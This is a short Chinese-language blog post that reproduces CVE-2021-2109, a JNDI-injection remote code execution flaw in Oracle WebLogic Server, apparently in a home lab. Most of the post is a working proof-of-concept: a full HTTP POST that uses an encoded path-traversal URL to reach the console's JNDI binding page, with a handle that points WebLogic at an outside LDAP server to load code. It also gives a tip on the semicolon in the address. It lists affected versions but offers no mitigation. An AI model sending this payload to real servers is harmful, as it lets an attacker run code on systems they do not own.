【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

Original SuPejkj 渗透Xiao白帽 2022-11-05

0x01 前言

CVE-2021-2109，该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入，导致攻击者可利用此漏洞远程代码执行。

0x02 影响版本

Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

0x03 环境搭建

本次环境用的之前搭建的，不做过多介绍，详细搭建过程参考上一篇

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

所用到的工具网上都有，也可后台回复"CVE-2021-2109"获取

0x04 漏洞复现

PoC:

POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1Host: 192.168.46.133:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ADMINCONSOLESESSION=2BYjPffl4uJEwegmeojCoLD4tJU-FOMPojHKs1usTlL-rS1iMAYD!-818656581Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 164

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.46;133:1389/g9ey7l;AdminServer%22)

这有个小细节就是ldap地址是用分号，这个地方我就踩了个坑，没仔细看poc试了好几次才发现

0x05 参考链接

https://mp.weixin.qq.com/s/QNz75BZOXK8DqmoTAwbV9ghttps://twitter.com/jas502n/status/1352076921190850563/photo/1

【往期推荐】

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现